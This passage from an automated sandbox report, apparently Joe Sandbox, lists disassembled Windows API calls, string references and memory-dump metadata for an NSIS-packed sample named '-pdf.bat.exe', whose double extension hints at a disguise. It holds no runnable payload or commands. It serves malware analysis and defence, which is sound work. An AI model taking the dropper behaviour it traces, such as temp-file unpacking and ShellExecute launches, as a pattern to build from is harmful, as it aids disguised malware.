                                                                                                                                                • SetCursor.USER32(00000000), ref: 004040CC
                                                                                                                                                  • Part of subcall function 00406B08: ShellExecuteExW.SHELL32(?), ref: 00406B17
                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040410E
                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404111
                                                                                                                                                • SendMessageW.USER32(00000111,?,00000000), ref: 0040413D
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000), ref: 00404155
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                • String ID: N$|B
                                                                                                                                                • API String ID: 3270077613-741270461
                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 0040104C
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401062
                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 00401143
                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                                                                                                                                • DrawTextW.USER32(00000000,00428D40,000000FF,?,00000820), ref: 00401171
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040117F
                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040118E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                • String ID: F
                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406373,?,?), ref: 00406456
                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00426E78,00000400), ref: 0040645F
                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00426678,00000400), ref: 0040647C
                                                                                                                                                • wsprintfA.USER32 ref: 0040649A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00426678,C0000000,?,00426678,?), ref: 004064D2
                                                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A), ref: 004064E2
                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406512
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426278,00000000,-0000000A,004089A4,00000000,[Rename],00000000,00000000,00000000), ref: 00406532
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406544
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040654B
                                                                                                                                                  • Part of subcall function 00406A30: GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                  • Part of subcall function 00406A30: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                • String ID: %ls=%ls$[Rename]$xfB$xnB
                                                                                                                                                • API String ID: 2900126502-517554076
                                                                                                                                                APIs
                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                Strings
                                                                                                                                                • *?|<>/":, xrefs: 00406EB6
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406E52, 00406E54
                                                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406E59
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                                • API String ID: 589700163-2188270913
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00403402
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403423
                                                                                                                                                • wsprintfW.USER32 ref: 00403452
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00403747,00000000), ref: 00403479
                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00403487
                                                                                                                                                  • Part of subcall function 004033CB: MulDiv.KERNEL32(00049694,?,00049694), ref: 004033E2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004057F6
                                                                                                                                                • GetMessagePos.USER32 ref: 004057FE
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00405818
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040582C
                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405854
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                • String ID: f
                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403765
                                                                                                                                                • wsprintfW.USER32 ref: 00403795
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004037A5
                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004037B7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 703112F8: GlobalAlloc.KERNEL32(?,?,703111C4,-000000A0), ref: 70311302
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703122F1
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70312326
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                APIs
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 7031116B
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703111AE
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703111CD
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 703111E6
                                                                                                                                                • GlobalFree.KERNEL32 ref: 7031125C
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 703112A7
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703112BF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                APIs
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703121BF
                                                                                                                                                  • Part of subcall function 703112E1: lstrcpynW.KERNEL32(00000000,?,7031156A,?,703111C4,-000000A0), ref: 703112F1
                                                                                                                                                • GlobalAlloc.KERNEL32(?), ref: 7031212C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7031214C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                APIs
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00401486
                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014D2
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004014DC
                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 004014FB
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401507
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseEnum$DeleteValue
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1354259210-0
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401F03
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                                                                                                                                • LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                APIs
                                                                                                                                                • GetDC.USER32 ref: 00401FB9
                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • CreateFontIndirectW.GDI32(0040C8E8), ref: 00402037
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4253744674-0
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,70312B4C,00000000,00000808), ref: 70311F8C
                                                                                                                                                • GlobalAlloc.KERNEL32(?,00000000), ref: 70311F97
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 70311FAB
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 70311FB6
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70311FBF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1148316912-0
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(00421200,%u.%u%s%s,?,00000000,00000000,?,?,00000000,?,000000DF,00421200,?,?,?,?,?), ref: 00405722
                                                                                                                                                • wsprintfW.USER32 ref: 0040572F
                                                                                                                                                • SetDlgItemTextW.USER32(?,00421200), ref: 00405746
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                APIs
                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                                                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                • String ID: !
                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                APIs
                                                                                                                                                • wsprintfW.USER32 ref: 70311F51
                                                                                                                                                • lstrcpyW.KERNEL32(?,error,00001018,70311765,00000000,?), ref: 70311F71
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrcpywsprintf
                                                                                                                                                • String ID: callback%d$error
                                                                                                                                                • API String ID: 2408954437-1307476583
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403DC6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406671
                                                                                                                                                • CharPrevW.USER32(?,00000000), ref: 0040667C
                                                                                                                                                • lstrcatW.KERNEL32(?,004082B0), ref: 0040668E
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040666B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                • API String ID: 2659869361-3355392842
                                                                                                                                                APIs
                                                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll), ref: 004028B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: lstrlen
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsq66FB.tmp$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 1659193697-976638190
                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401F4D
                                                                                                                                                • LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401FA1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClientDeleteImageLoadMessageObjectRectSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1043200266-0
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                  • Part of subcall function 00406B08: ShellExecuteExW.SHELL32(?), ref: 00406B17
                                                                                                                                                  • Part of subcall function 00406629: WaitForSingleObject.KERNEL32(?,?), ref: 00406633
                                                                                                                                                  • Part of subcall function 00406629: GetExitCodeProcess.KERNEL32(?,?), ref: 0040665D
                                                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                                                                                                                                Strings
                                                                                                                                                • C:\Users\user\AppData\Local\Anvilled, xrefs: 004020D1
                                                                                                                                                • @, xrefs: 004020F2
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll, xrefs: 00402098
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                                                                                                                                • String ID: @$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 4079680657-608496885
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406C2F: lstrcpynW.KERNEL32(?,?,00000400,00403979,00428D40,NSIS Error), ref: 00406C3C
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(?,?,?,00000000,00425A78,00406764,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 00406CE9
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(00000000), ref: 00406CEE
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(00000000), ref: 00406D08
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                  • Part of subcall function 00406E52: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                • lstrlenW.KERNEL32(00425A78,00000000,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 004067A1
                                                                                                                                                • GetFileAttributesW.KERNEL32(00425A78,00425A78), ref: 004067B2
                                                                                                                                                  • Part of subcall function 004066E4: FindFirstFileW.KERNELBASE(00000000,00427678,00000000,00406791,00425A78), ref: 004066EF
                                                                                                                                                  • Part of subcall function 004066E4: FindClose.KERNEL32(00000000), ref: 004066FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                                                                                • String ID: xZB
                                                                                                                                                • API String ID: 1879705256-2099606936
                                                                                                                                                APIs
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00424230,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,?,004060BE), ref: 00406AD3
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00406ADE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                • String ID: Call
                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                APIs
                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405A07
                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405A4F
                                                                                                                                                  • Part of subcall function 004055EB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
